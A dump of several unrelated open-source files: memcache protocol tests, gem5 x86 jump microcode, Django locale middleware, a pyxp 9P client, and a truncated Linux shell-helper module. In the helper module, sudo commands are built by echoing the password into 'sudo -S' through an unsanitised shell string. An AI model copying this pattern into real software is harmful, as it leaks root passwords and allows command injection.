self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.assertEqual(call('delete key\r\n'), b'DELETED\r\n')
self.assertEqual(call('delete key\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('get key\r\n'), b'END\r\n')
def test_error_handling(self):
self.assertEqual(call('get\r\n'), b'ERROR\r\n')
@slow
def test_expiry(self):
self.assertEqual(call('set key 0 1 5\r\nhello\r\n'), b'STORED\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
time.sleep(1)
self.assertEqual(call('get key\r\n'), b'END\r\n')
@slow
def test_expiry_at_epoch_time(self):
expiry = int(time.time()) + 1
self.assertEqual(call('set key 0 %d 5\r\nhello\r\n' % expiry), b'STORED\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
time.sleep(2)
self.assertEqual(call('get key\r\n'), b'END\r\n')
def test_multiple_keys_in_get(self):
self.assertEqual(call('set key1 0 0 2\r\nv1\r\n'), b'STORED\r\n')
self.assertEqual(call('set key 0 0 2\r\nv2\r\n'), b'STORED\r\n')
resp = call('get key1 key\r\n')
self.assertRegexpMatches(resp, b'^(VALUE key1 0 2\r\nv1\r\nVALUE key 0 2\r\nv2\r\nEND\r\n)|(VALUE key 0 2\r\nv2\r\nVALUE key1 0 2\r\nv1\r\nEND\r\n)$')
self.delete("key")
self.delete("key1")
def test_flush_all(self):
self.set('key', 'value')
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
self.assertNoKey('key')
def test_keys_set_after_flush_remain(self):
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
self.setKey('key')
self.assertHasKey('key')
self.delete('key')
@slow
def test_flush_all_with_timeout_flushes_all_keys_even_those_set_after_flush(self):
self.setKey('key')
self.assertEqual(call('flush_all 2\r\n'), b'OK\r\n')
self.assertHasKey('key')
self.setKey('key2')
time.sleep(2)
self.assertNoKey('key')
self.assertNoKey('key2')
@slow
def test_subsequent_flush_is_merged(self):
self.setKey('key')
self.assertEqual(call('flush_all 2\r\n'), b'OK\r\n') # Can flush in anything between 1-2
self.assertEqual(call('flush_all 4\r\n'), b'OK\r\n') # Can flush in anything between 3-4
time.sleep(2)
self.assertHasKey('key')
self.setKey('key2')
time.sleep(4)
self.assertNoKey('key')
self.assertNoKey('key2')
@slow
def test_immediate_flush_cancels_delayed_flush(self):
self.assertEqual(call('flush_all 2\r\n'), b'OK\r\n')
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
self.setKey('key')
time.sleep(1)
self.assertHasKey('key')
self.delete('key')
@slow
def test_flushing_in_the_past(self):
self.setKey('key1')
time.sleep(1)
self.setKey('key2')
key2_time = int(time.time())
self.assertEqual(call('flush_all %d\r\n' % (key2_time - 1)), b'OK\r\n')
self.assertNoKey("key1")
self.assertNoKey("key2")
@slow
def test_memcache_does_not_crash_when_flushing_with_already_expired_items(self):
self.assertEqual(call('set key1 0 2 5\r\nhello\r\n'), b'STORED\r\n')
time.sleep(1)
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
def test_response_spanning_many_datagrams(self):
key1_data = '1' * 1000
key2_data = '2' * 1000
key3_data = '3' * 1000
self.set('key1', key1_data)
self.set('key2', key2_data)
self.set('key3', key3_data)
resp = call('get key1 key2 key3\r\n').decode()
pattern = '^VALUE (?P<v1>.*?\r\n.*?)\r\nVALUE (?P<v2>.*?\r\n.*?)\r\nVALUE (?P<v3>.*?\r\n.*?)\r\nEND\r\n$'
self.assertRegexpMatches(resp, pattern)
m = re.match(pattern, resp)
self.assertEqual(set([m.group('v1'), m.group('v2'), m.group('v3')]),
set(['key1 0 %d\r\n%s' % (len(key1_data), key1_data),
'key2 0 %d\r\n%s' % (len(key2_data), key2_data),
'key3 0 %d\r\n%s' % (len(key3_data), key3_data)]))
self.delete('key1')
self.delete('key2')
self.delete('key3')
def test_version(self):
self.assertRegexpMatches(call('version\r\n'), b'^VERSION .*\r\n$')
def test_add(self):
self.assertEqual(call('add key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.assertEqual(call('add key 0 0 1\r\na\r\n'), b'NOT_STORED\r\n')
self.delete('key')
def test_replace(self):
self.assertEqual(call('add key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.assertEqual(call('replace key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.delete('key')
self.assertEqual(call('replace key 0 0 1\r\na\r\n'), b'NOT_STORED\r\n')
def test_cas_and_gets(self):
self.assertEqual(call('cas key 0 0 1 1\r\na\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('add key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
version = self.getItemVersion('key')
self.assertEqual(call('set key 1 0 5\r\nhello\r\n'), b'STORED\r\n')
self.assertEqual(call('gets key\r\n').decode(), 'VALUE key 1 5 %d\r\nhello\r\nEND\r\n' % (version + 1))
self.assertEqual(call('cas key 0 0 5 %d\r\nhello\r\n' % (version)), b'EXISTS\r\n')
self.assertEqual(call('cas key 0 0 5 %d\r\naloha\r\n' % (version + 1)), b'STORED\r\n')
self.assertEqual(call('gets key\r\n').decode(), 'VALUE key 0 5 %d\r\naloha\r\nEND\r\n' % (version + 2))
self.delete('key')
def test_curr_items_stat(self):
self.assertEquals(0, int(self.getStat('curr_items')))
self.setKey('key')
self.assertEquals(1, int(self.getStat('curr_items')))
self.delete('key')
self.assertEquals(0, int(self.getStat('curr_items')))
def test_how_stats_change_with_different_commands(self):
get_count = int(self.getStat('cmd_get'))
set_count = int(self.getStat('cmd_set'))
flush_count = int(self.getStat('cmd_flush'))
total_items = int(self.getStat('total_items'))
get_misses = int(self.getStat('get_misses'))
get_hits = int(self.getStat('get_hits'))
cas_hits = int(self.getStat('cas_hits'))
cas_badval = int(self.getStat('cas_badval'))
cas_misses = int(self.getStat('cas_misses'))
delete_misses = int(self.getStat('delete_misses'))
delete_hits = int(self.getStat('delete_hits'))
curr_connections = int(self.getStat('curr_connections'))
incr_hits = int(self.getStat('incr_hits'))
incr_misses = int(self.getStat('incr_misses'))
decr_hits = int(self.getStat('decr_hits'))
decr_misses = int(self.getStat('decr_misses'))
call('get key\r\n')
get_count += 1
get_misses += 1
call('gets key\r\n')
get_count += 1
get_misses += 1
call('set key1 0 0 1\r\na\r\n')
set_count += 1
total_items += 1
call('get key1\r\n')
get_count += 1
get_hits += 1
call('add key1 0 0 1\r\na\r\n')
set_count += 1
call('add key2 0 0 1\r\na\r\n')
set_count += 1
total_items += 1
call('replace key1 0 0 1\r\na\r\n')
set_count += 1
total_items += 1
call('replace key3 0 0 1\r\na\r\n')
set_count += 1
call('cas key4 0 0 1 1\r\na\r\n')
set_count += 1
cas_misses += 1
call('cas key1 0 0 1 %d\r\na\r\n' % self.getItemVersion('key1'))
set_count += 1
get_count += 1
get_hits += 1
cas_hits += 1
total_items += 1
call('cas key1 0 0 1 %d\r\na\r\n' % (self.getItemVersion('key1') + 1))
set_count += 1
get_count += 1
get_hits += 1
cas_badval += 1
call('delete key1\r\n')
delete_hits += 1
call('delete key1\r\n')
delete_misses += 1
call('incr num 1\r\n')
incr_misses += 1
call('decr num 1\r\n')
decr_misses += 1
call('set num 0 0 1\r\n0\r\n')
set_count += 1
total_items += 1
call('incr num 1\r\n')
incr_hits += 1
call('decr num 1\r\n')
decr_hits += 1
self.flush()
flush_count += 1
self.assertEquals(get_count, int(self.getStat('cmd_get')))
self.assertEquals(set_count, int(self.getStat('cmd_set')))
self.assertEquals(flush_count, int(self.getStat('cmd_flush')))
self.assertEquals(total_items, int(self.getStat('total_items')))
self.assertEquals(get_hits, int(self.getStat('get_hits')))
self.assertEquals(get_misses, int(self.getStat('get_misses')))
self.assertEquals(cas_misses, int(self.getStat('cas_misses')))
self.assertEquals(cas_hits, int(self.getStat('cas_hits')))
self.assertEquals(cas_badval, int(self.getStat('cas_badval')))
self.assertEquals(delete_misses, int(self.getStat('delete_misses')))
self.assertEquals(delete_hits, int(self.getStat('delete_hits')))
self.assertEquals(0, int(self.getStat('curr_items')))
self.assertEquals(curr_connections, int(self.getStat('curr_connections')))
self.assertEquals(incr_misses, int(self.getStat('incr_misses')))
self.assertEquals(incr_hits, int(self.getStat('incr_hits')))
self.assertEquals(decr_misses, int(self.getStat('decr_misses')))
self.assertEquals(decr_hits, int(self.getStat('decr_hits')))
def test_incr(self):
self.assertEqual(call('incr key 0\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('set key 0 0 1\r\n0\r\n'), b'STORED\r\n')
self.assertEqual(call('incr key 0\r\n'), b'0\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 1\r\n0\r\nEND\r\n')
self.assertEqual(call('incr key 1\r\n'), b'1\r\n')
self.assertEqual(call('incr key 2\r\n'), b'3\r\n')
self.assertEqual(call('incr key %d\r\n' % (pow(2, 64) - 1)), b'2\r\n')
self.assertEqual(call('incr key %d\r\n' % (pow(2, 64) - 3)), b'18446744073709551615\r\n')
self.assertRegexpMatches(call('incr key 1\r\n').decode(), r'0(\w+)?\r\n')
self.assertEqual(call('set key 0 0 2\r\n1 \r\n'), b'STORED\r\n')
self.assertEqual(call('incr key 1\r\n'), b'2\r\n')
self.assertEqual(call('set key 0 0 2\r\n09\r\n'), b'STORED\r\n')
self.assertEqual(call('incr key 1\r\n'), b'10\r\n')
def test_decr(self):
self.assertEqual(call('decr key 0\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('set key 0 0 1\r\n7\r\n'), b'STORED\r\n')
self.assertEqual(call('decr key 1\r\n'), b'6\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 1\r\n6\r\nEND\r\n')
self.assertEqual(call('decr key 6\r\n'), b'0\r\n')
self.assertEqual(call('decr key 2\r\n'), b'0\r\n')
self.assertEqual(call('set key 0 0 2\r\n20\r\n'), b'STORED\r\n')
self.assertRegexpMatches(call('decr key 11\r\n').decode(), r'^9( )?\r\n$')
self.assertEqual(call('set key 0 0 3\r\n100\r\n'), b'STORED\r\n')
self.assertRegexpMatches(call('decr key 91\r\n').decode(), r'^9( )?\r\n$')
self.assertEqual(call('set key 0 0 2\r\n1 \r\n'), b'STORED\r\n')
self.assertEqual(call('decr key 1\r\n'), b'0\r\n')
self.assertEqual(call('set key 0 0 2\r\n09\r\n'), b'STORED\r\n')
self.assertEqual(call('decr key 1\r\n'), b'8\r\n')
def test_incr_and_decr_on_invalid_input(self):
error_msg = b'CLIENT_ERROR cannot increment or decrement non-numeric value\r\n'
for cmd in ['incr', 'decr']:
for value in ['', '-1', 'a', '0x1', '18446744073709551616']:
self.assertEqual(call('set key 0 0 %d\r\n%s\r\n' % (len(value), value)), b'STORED\r\n')
prev = call('get key\r\n')
self.assertEqual(call(cmd + ' key 1\r\n'), error_msg, "cmd=%s, value=%s" % (cmd, value))
self.assertEqual(call('get key\r\n'), prev)
self.delete('key')
def wait_for_memcache_tcp(timeout=4):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
timeout_at = time.time() + timeout
while True:
if time.time() >= timeout_at:
raise TimeoutError()
try:
s.connect(server_addr)
s.close()
break
except ConnectionRefusedError:
time.sleep(0.1)
def wait_for_memcache_udp(timeout=4):
timeout_at = time.time() + timeout
while True:
if time.time() >= timeout_at:
raise TimeoutError()
try:
udp_call('version\r\n', timeout=0.2)
break
except socket.timeout:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="memcache protocol tests")
parser.add_argument('--server', '-s', action="store", help="server address in <host>:<port> format", default="localhost:11211")
parser.add_argument('--udp', '-U', action="store_true", help="Use UDP protocol")
parser.add_argument('--fast', action="store_true", help="Run only fast tests")
args = parser.parse_args()
host, port = args.server.split(':')
server_addr = (host, int(port))
if args.udp:
call = udp_call
wait_for_memcache_udp()
else:
call = tcp_call
wait_for_memcache_tcp()
runner = unittest.TextTestRunner()
loader = unittest.TestLoader()
suite = unittest.TestSuite()
suite.addTest(loader.loadTestsFromTestCase(TestCommands))
if args.udp:
suite.addTest(loader.loadTestsFromTestCase(UdpSpecificTests))
else:
suite.addTest(loader.loadTestsFromTestCase(TcpSpecificTests))
result = runner.run(suite)
if not result.wasSuccessful():
sys.exit(1)
| apache-2.0 |
danielpalomino/gem5 | src/arch/x86/isa/insts/general_purpose/control_transfer/jump.py | 40 | 5389 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop JMP_I
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
rdip t1
limm t2, imm
wrip t1, t2
};
def macroop JMP_R
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
wripi reg, 0
};
def macroop JMP_M
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
ld t1, seg, sib, disp
wripi t1, 0
};
def macroop JMP_P
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
rdip t7
ld t1, seg, riprel, disp
wripi t1, 0
};
def macroop JMP_FAR_M
{
limm t1, 0, dataSize=8
limm t2, 0, dataSize=8
lea t1, seg, sib, disp, dataSize=asz
ld t2, seg, [1, t0, t1], dsz
ld t1, seg, [1, t0, t1]
br rom_label("jmpFarWork")
};
def macroop JMP_FAR_P
{
limm t1, 0, dataSize=8
limm t2, 0, dataSize=8
rdip t7, dataSize=asz
lea t1, seg, riprel, disp, dataSize=asz
ld t2, seg, [1, t0, t1], dsz
ld t1, seg, [1, t0, t1]
br rom_label("jmpFarWork")
};
def macroop JMP_FAR_I
{
# Put the whole far pointer into a register.
limm t2, imm, dataSize=8
# Figure out the width of the offset.
limm t3, dsz, dataSize=8
slli t3, t3, 3, dataSize=8
# Get the offset into t1.
mov t1, t0, t2
# Get the selector into t2.
srl t2, t2, t3, dataSize=8
mov t2, t0, t2, dataSize=2
br rom_label("jmpFarWork")
};
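# Worked example of the unpacking above (values chosen for illustration):
# with a 16-bit operand size, dsz = 2 so t3 becomes 16; for imm = 0x00080100
# the low 16 bits 0x0100 land in t1 as the offset, and the shift leaves the
# selector 0x0008 in t2.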
def rom
{
extern jmpFarWork:
# t1 has the offset and t2 has the new selector.
# This is intended to run in protected mode.
andi t0, t2, 0xFC, flags=(EZF,), dataSize=2
fault "new GeneralProtection(0)", flags=(CEZF,)
andi t3, t2, 0xF8, dataSize=8
andi t0, t2, 0x4, flags=(EZF,), dataSize=2
br rom_local_label("farJmpGlobalDescriptor"), flags=(CEZF,)
ld t4, tsl, [1, t0, t3], dataSize=8, addressSize=8, atCPL0=True
br rom_local_label("farJmpProcessDescriptor")
farJmpGlobalDescriptor:
ld t4, tsg, [1, t0, t3], dataSize=8, addressSize=8, atCPL0=True
farJmpProcessDescriptor:
rcri t0, t4, 13, flags=(ECF,), dataSize=2
br rom_local_label("farJmpSystemDescriptor"), flags=(nCECF,)
chks t2, t4, CSCheck, dataSize=8
wrdl cs, t4, t2
wrsel cs, t2
wrip t0, t1
eret
farJmpSystemDescriptor:
panic "Far jumps to system descriptors aren't implemented"
eret
};
def macroop JMP_FAR_REAL_M
{
lea t1, seg, sib, disp, dataSize=asz
ld t2, seg, [1, t0, t1], dsz
ld t1, seg, [1, t0, t1]
zexti t3, t1, 15, dataSize=8
slli t3, t3, 4, dataSize=8
wrsel cs, t1, dataSize=2
wrbase cs, t3
wrip t0, t2, dataSize=asz
};
def macroop JMP_FAR_REAL_P
{
panic "Real mode far jump executed in 64 bit mode!"
};
def macroop JMP_FAR_REAL_I
{
# Put the whole far pointer into a register.
limm t2, imm, dataSize=8
# Figure out the width of the offset.
limm t3, dsz, dataSize=8
slli t3, t3, 3, dataSize=8
# Get the selector into t1.
sll t1, t2, t3, dataSize=8
mov t1, t0, t1, dataSize=2
# And get the offset into t2
mov t2, t0, t2
slli t3, t3, 4, dataSize=8
wrsel cs, t1, dataSize=2
wrbase cs, t3
wrip t0, t2, dataSize=asz
};
'''
| bsd-3-clause |
gmacchi93/serverInfoParaguay | apps/venv/lib/python2.7/site-packages/django/middleware/locale.py | 85 | 3156 | "This is the locale selecting middleware that will look at accept headers"
from django.conf import settings
from django.core.urlresolvers import (
LocaleRegexURLResolver, get_resolver, get_script_prefix, is_valid_path,
)
from django.http import HttpResponseRedirect
from django.utils import translation
from django.utils.cache import patch_vary_headers
class LocaleMiddleware(object):
"""
This is a very simple middleware that parses a request
and decides what translation object to install in the current
thread context. This allows pages to be dynamically
translated to the language the user desires (if the language
is available, of course).
"""
response_redirect_class = HttpResponseRedirect
def __init__(self):
self._is_language_prefix_patterns_used = False
for url_pattern in get_resolver(None).url_patterns:
if isinstance(url_pattern, LocaleRegexURLResolver):
self._is_language_prefix_patterns_used = True
break
def process_request(self, request):
check_path = self.is_language_prefix_patterns_used()
language = translation.get_language_from_request(
request, check_path=check_path)
translation.activate(language)
request.LANGUAGE_CODE = translation.get_language()
def process_response(self, request, response):
language = translation.get_language()
language_from_path = translation.get_language_from_path(request.path_info)
if (response.status_code == 404 and not language_from_path
and self.is_language_prefix_patterns_used()):
urlconf = getattr(request, 'urlconf', None)
language_path = '/%s%s' % (language, request.path_info)
path_valid = is_valid_path(language_path, urlconf)
if (not path_valid and settings.APPEND_SLASH
and not language_path.endswith('/')):
path_valid = is_valid_path("%s/" % language_path, urlconf)
if path_valid:
script_prefix = get_script_prefix()
language_url = "%s://%s%s" % (
request.scheme,
request.get_host(),
# insert language after the script prefix and before the
# rest of the URL
request.get_full_path().replace(
script_prefix,
'%s%s/' % (script_prefix, language),
1
)
)
return self.response_redirect_class(language_url)
if not (self.is_language_prefix_patterns_used()
and language_from_path):
patch_vary_headers(response, ('Accept-Language',))
if 'Content-Language' not in response:
response['Content-Language'] = language
return response
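# Illustrative behavior of the redirect above (hypothetical host and paths):
# with language prefix patterns in use and active language 'fr', a 404 for
# '/about/' is answered with a redirect to 'http://example.com/fr/about/'
# whenever the prefixed path resolves.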
def is_language_prefix_patterns_used(self):
"""
Returns `True` if the `LocaleRegexURLResolver` is used
at root level of the urlpatterns, else it returns `False`.
"""
return self._is_language_prefix_patterns_used
| apache-2.0 |
bwhmather/wmii | alternative_wmiircs/python/pyxp/client.py | 9 | 9838 | # Copyright (C) 2009 Kris Maglione
import operator
import os
import re
import sys
from threading import *
import traceback
import pyxp
from pyxp import fcall, fields
from pyxp.mux import Mux
from pyxp.types import *
if os.environ.get('NAMESPACE', None):
namespace = os.environ['NAMESPACE']
else:
try:
namespace = '/tmp/ns.%s.%s' % (
os.environ['USER'],
re.sub(r'\.0$', '', os.environ['DISPLAY']))
except Exception:
namespace = None  # USER or DISPLAY unset; keeps the NAMESPACE assignment below from raising NameError
NAMESPACE = namespace
OREAD = 0x00
OWRITE = 0x01
ORDWR = 0x02
OEXEC = 0x03
OEXCL = 0x04
OTRUNC = 0x10
OREXEC = 0x20
ORCLOSE = 0x40
OAPPEND = 0x80
ROOT_FID = 0
class ProtocolException(Exception):
pass
class RPCError(Exception):
pass
class Client(object):
ROOT_FID = 0
@staticmethod
def respond(callback, data, exc=None, tb=None):
if hasattr(callback, 'func_code'):
callback(*(data, exc, tb)[0:callback.func_code.co_argcount])
elif callable(callback):
callback(data)
def __enter__(self):
return self
def __exit__(self, *args):
self._cleanup()
def __init__(self, conn=None, namespace=None, root=None):
if not conn and namespace:
conn = 'unix!%s/%s' % (NAMESPACE, namespace)
try:
self.lastfid = ROOT_FID
self.fids = set()
self.lock = RLock()
def process(data):
return fcall.Fcall.unmarshall(data)[1]
self.mux = Mux(conn, process, maxtag=256)
resp = self._dorpc(fcall.Tversion(version=pyxp.VERSION, msize=65535))
if resp.version != pyxp.VERSION:
raise ProtocolException, "Can't speak 9P version '%s'" % resp.version
self.msize = resp.msize
self._dorpc(fcall.Tattach(fid=ROOT_FID, afid=fcall.NO_FID,
uname=os.environ['USER'], aname=''))
if root:
path = self._splitpath(root)
resp = self._dorpc(fcall.Twalk(fid=ROOT_FID,
newfid=ROOT_FID,
wname=path))
except Exception:
traceback.print_exc(sys.stdout)
if getattr(self, 'mux', None):
self.mux.fd.close()
raise
def _cleanup(self):
try:
for f in getattr(self, 'files', ()):  # no file registry is populated here; guard avoids AttributeError on close
f.close()
finally:
self.mux.fd.close()
self.mux = None
def _dorpc(self, req, callback=None, error=None):
def doresp(resp):
if isinstance(resp, fcall.Rerror):
raise RPCError, "%s[%d] RPC returned error: %s" % (
req.__class__.__name__, resp.tag, resp.ename)
if req.type != resp.type ^ 1:
raise ProtocolException, "Missmatched RPC message types: %s => %s" % (
req.__class__.__name__, resp.__class__.__name__)
return resp
def next(mux, resp):
try:
res = doresp(resp)
except Exception, e:
self.respond(error or callback, None, e, None)
else:
self.respond(callback, res)
if not callback:
return doresp(self.mux.rpc(req))
self.mux.rpc(req, next)
def _splitpath(self, path):
if isinstance(path, list):
return path
return [v for v in path.split('/') if v != '']
def _getfid(self):
with self.lock:
if self.fids:
return self.fids.pop()
self.lastfid += 1
return self.lastfid
def _putfid(self, fid):
with self.lock:
self.fids.add(fid)
def _aclunk(self, fid, callback=None):
def next(resp, exc, tb):
if resp:
self._putfid(fid)
self.respond(callback, resp, exc, tb)
self._dorpc(fcall.Tclunk(fid=fid), next)
def _clunk(self, fid):
try:
self._dorpc(fcall.Tclunk(fid=fid))
finally:
self._putfid(fid)
def _walk(self, path):
fid = self._getfid()
ofid = ROOT_FID
while True:
self._dorpc(fcall.Twalk(fid=ofid, newfid=fid,
wname=path[0:fcall.MAX_WELEM]))
path = path[fcall.MAX_WELEM:]
ofid = fid
if len(path) == 0:
break
@apply
class Res:
def __enter__(res):
return fid
def __exit__(res, exc_type, exc_value, traceback):
if exc_type:
self._clunk(fid)
return Res
_file = property(lambda self: File)
def _open(self, path, mode, fcall, origpath=None):
resp = None
with self._walk(path) as nfid:
fid = nfid
fcall.fid = fid
resp = self._dorpc(fcall)
def cleanup():
self._aclunk(fid)
file = self._file(self, origpath or '/'.join(path), resp, fid, mode, cleanup)
return file
def open(self, path, mode=OREAD):
path = self._splitpath(path)
return self._open(path, mode, fcall.Topen(mode=mode))
def create(self, path, mode=OREAD, perm=0):
path = self._splitpath(path)
name = path.pop()
return self._open(path, mode, fcall.Tcreate(mode=mode, name=name, perm=perm),
origpath='/'.join(path + [name]))
def remove(self, path):
path = self._splitpath(path)
with self._walk(path) as fid:
self._dorpc(fcall.Tremove(fid=fid))
def stat(self, path):
path = self._splitpath(path)
try:
with self._walk(path) as fid:
resp = self._dorpc(fcall.Tstat(fid= fid))
st = resp.stat
self._clunk(fid)
return st
except RPCError:
return None
def read(self, path, *args, **kwargs):
with self.open(path) as f:
return f.read(*args, **kwargs)
def readlines(self, path, *args, **kwargs):
with self.open(path) as f:
for l in f.readlines(*args, **kwargs):
yield l
def readdir(self, path, *args, **kwargs):
with self.open(path) as f:
for s in f.readdir(*args, **kwargs):
yield s
def write(self, path, *args, **kwargs):
with self.open(path, OWRITE) as f:
return f.write(*args, **kwargs)
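# Minimal usage sketch (assumes a 9P server exporting a 'ctl' file under the
# given namespace; the paths and commands are illustrative, not part of this
# module):
#
#     with Client(namespace='wmii') as c:
#         print c.read('/ctl')         # slurp a whole file
#         c.write('/ctl', 'view 1')    # write a command string
#         for st in c.readdir('/'):    # iterate Stat entries of a directory
#             print st.name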
class File(object):
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __init__(self, client, path, fcall, fid, mode, cleanup):
self.lock = RLock()
self.client = client
self.path = path
self.fid = fid
self._cleanup = cleanup
self.mode = mode
self.iounit = fcall.iounit
self.qid = fcall.qid
self.closed = False
self.offset = 0
def __del__(self):
if not self.closed:
self._cleanup()
def _dorpc(self, fcall, async=None, error=None):
if hasattr(fcall, 'fid'):
fcall.fid = self.fid
return self.client._dorpc(fcall, async, error)
def stat(self):
resp = self._dorpc(fcall.Tstat())
return resp.stat
def read(self, count=None, offset=None, buf=''):
if count is None:
count = self.iounit
res = []
with self.lock:
offs = self.offset
if offset is not None:
offs = offset
while count > 0:
n = min(count, self.iounit)
count -= n
resp = self._dorpc(fcall.Tread(offset=offs, count=n))
data = resp.data
offs += len(data)
res.append(data)
if len(data) < n:
break
if offset is None:
self.offset = offs
return ''.join(res)
def readlines(self):
last = None
while True:
data = self.read()
if not data:
break
lines = data.split('\n')
if last:
lines[0] = last + lines[0]
last = None
for i in range(0, len(lines) - 1):
yield lines[i]
last = lines[-1]
if last:
yield last
def write(self, data, offset=None):
# Leave offset as None for stateful writes so the final "if offset is None"
# below can advance self.offset, mirroring read().
off = 0
with self.lock:
offs = self.offset
if offset is not None:
offs = offset
while off < len(data):
n = min(len(data) - off, self.iounit)
resp = self._dorpc(fcall.Twrite(offset=offs,
data=data[off:off+n]))
off += resp.count
offs += resp.count
if resp.count < n:
break
if offset is None:
self.offset = offs
return off
def readdir(self):
if not self.qid.type & Qid.QTDIR:
raise Exception, "Can only call readdir on a directory"
off = 0
while True:
data = self.read(self.iounit, off)
if not data:
break
off += len(data)
for s in Stat.unmarshall_list(data):
yield s
def close(self):
assert not self.closed
self.closed = True
try:
self._cleanup()
except:
pass
self.tg = None
self.fid = None
self.client = None
self.qid = None
def remove(self):
try:
self._dorpc(fcall.Tremove())
finally:
self.close()
# vim:se sts=4 sw=4 et:
| mit |
furkantokac/Faunus | src/utilinux.py | 1 | 3351 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import subprocess, os, socket
def validate_ip(addr):
try:
socket.inet_aton(addr)
return True # legal
except socket.error:
return False # Not legal
def get_stdout(pi):
result = pi.communicate()
if len(result[0])>0:
return result[0]
else:
return result[1] # some error has occured
def killall(process_name):
counter = 0
pid = is_process_running(process_name)
while pid!=0:
execute_shell('kill '+str(pid))
pid = is_process_running(process_name)
counter += 1
return counter
def execute_shell(command, error=''):
return execute(command, wait=True, shellexec=True, errorstring=error)
def execute_shell_root(command, sudo_pwd='', error=''):
command = "echo "+str(sudo_pwd)+" | sudo -S "+command
return execute(command, wait=True, shellexec=True, errorstring=error)
def execute(command='', wait=True, shellexec=False, errorstring='', ags=None):
try:
if (shellexec):
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
p = subprocess.Popen(args=ags)
if wait:
p.wait()
result = get_stdout(p)
return result
else:
return p
except subprocess.CalledProcessError as e:
print('Error occurred : '+errorstring)
return errorstring
except Exception as ea:
print('Exception occurred : '+str(ea))  # Python 3 exceptions have no .message attribute
return errorstring
def is_process_running(name):
cmd = 'ps aux |grep '+name+' |grep -v grep'
s = execute_shell(cmd)
if len(s)==0:
return 0
else:
t = s.split()
return int(t[1])
def check_dependency(packet_name):
if len(check_sysfile(packet_name))==0:
print(packet_name+" executable not found. Make sure you have installed "+packet_name)
return False
return True
def check_sysfile(filename):
if os.path.exists('/usr/sbin/'+filename):
return '/usr/sbin/'+filename
elif os.path.exists('/sbin/'+filename):
return '/sbin/'+filename
else:
return ''
def get_sysctl(setting, sudo_pwd):
result = execute_shell_root('sysctl '+setting, sudo_pwd).decode("utf-8")
if '=' in result:
return result.split('=')[1].lstrip()
else:
return result
def set_sysctl(setting, value, sudo_pwd):
return execute_shell_root('sysctl -w '+setting+'='+value, sudo_pwd).decode("utf-8")
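# Example (illustrative key and value): enable IPv4 forwarding, then read it
# back; get_sysctl typically returns the text after '=', newline included.
#
#     set_sysctl('net.ipv4.ip_forward', '1', sudo_pwd)
#     get_sysctl('net.ipv4.ip_forward', sudo_pwd)   # -> '1\n'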
def interface_iw(name):
response = execute_shell('iwconfig').decode("utf-8")
lines = response.splitlines()
for line in lines:
if not line.startswith(' ') and len(line)>0:
text = line.split(' ')[0]
if line.startswith(name):
return text
return False
def interface_if(name):
response = execute_shell('ifconfig').decode("utf-8")
lines = response.splitlines()
for line in lines:
if not line.startswith(' ') and len(line)>0:
text = line.split(' ')[0]
if text.startswith(name):
return text
return False
def check_eth_connected(sudo_pwd):
response = execute_shell_root("ethtool eth0 | grep detected:", sudo_pwd).decode("utf-8")
if "yes" in response:
